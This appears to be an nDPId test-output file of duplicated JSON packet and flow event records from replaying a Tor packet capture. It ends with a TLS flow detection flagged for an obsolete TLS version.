00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1956,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822153962,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":1956,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822153962,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1956,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822158212} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":1956,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822158212}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1957,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822153962,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":1957,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822153962,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1957,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822160212} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":1957,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822160212}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1958,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822153962,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":1958,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822153962,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1958,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822162212} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":1958,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822162212}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1959,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822153962,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":1959,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822153962,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1959,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822164212} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":1959,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822164212}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1960,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822153962,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":1960,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822153962,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1960,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822166212} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":1960,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822166212}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1961,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822153962,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":1961,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822153962,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1961,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822168212} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":1961,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822168212}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1975,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822170108,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":1975,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822170108,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1975,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822170212} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":1975,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822170212}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1986,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822172115,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":1986,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822172115,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1986,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822172212} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":1986,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822172212}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2022,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822174148,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":2022,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822174148,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2022,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822174212} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":2022,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822174212}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2042,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822175546,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":2042,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822175546,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2042,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822176212} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":2042,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822176212}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2058,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822178103,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":2058,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822178103,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2058,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822178212} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":2058,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822178212}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2061,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822179522,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":2061,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822179522,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2061,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822180212} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":2061,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822180212}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2066,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822180832,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":2066,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822180832,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2066,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822182212} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":2066,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822182212}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2068,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822184001,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":2068,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822184001,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2068,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822184212} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":2068,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822184212}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2069,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822184001,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":2069,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822184001,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2069,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822186212} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":2069,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822186212}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2070,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822184001,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":2070,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822184001,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2070,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822188212} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":2070,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822188212}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2071,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822184001,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":2071,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822184001,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2071,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822190212} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":2071,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822190212}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2072,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383822190886,"flow_last_seen":1383822190886,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1383822190886,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"62.210.137.230","src_port":51185,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2072,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383822190886,"flow_last_seen":1383822190886,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1383822190886,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"62.210.137.230","src_port":51185,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2072,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1383822190886,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383822190886,"pkt":"UlQA2EYhUlQAWul3CABFAAA0COtAAIAGZnzAqAH8PtKJ5sfxAbspsDzeAAAAAIACIACTeAAAAgQFtAEDAwgBAQQC"} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2072,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1383822190886,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383822190886,"pkt":"UlQA2EYhUlQAWul3CABFAAA0COtAAIAGZnzAqAH8PtKJ5sfxAbspsDzeAAAAAIACIACTeAAAAgQFtAEDAwgBAQQC"}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2073,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1383822190950,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383822190950,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAADEGvmc+0onmwKgB\/AG7x\/Gvhi1nKbA834ASOQidcgAAAgQFtAEBBAIBAwMH"} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2073,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1383822190950,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383822190950,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAADEGvmc+0onmwKgB\/AG7x\/Gvhi1nKbA834ASOQidcgAAAgQFtAEBBAIBAwMH"}
00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2074,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1383822190951,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383822190951,"pkt":"UlQA2EYhUlQAWul3CABFAAAoCOxAAIAGZofAqAH8PtKJ5sfxAbspsDzfr4YtaFAQAQAWTQAAAAAAAAAA"} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2074,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1383822190951,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383822190951,"pkt":"UlQA2EYhUlQAWul3CABFAAAoCOxAAIAGZofAqAH8PtKJ5sfxAbspsDzfr4YtaFAQAQAWTQAAAAAAAAAA"}
00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2075,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383822190886,"flow_last_seen":1383822190951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1383822190951,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"62.210.137.230","src_port":51185,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.6gyip7tqim7sieb.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2075,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383822190886,"flow_last_seen":1383822190951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1383822190951,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"62.210.137.230","src_port":51185,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.6gyip7tqim7sieb.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
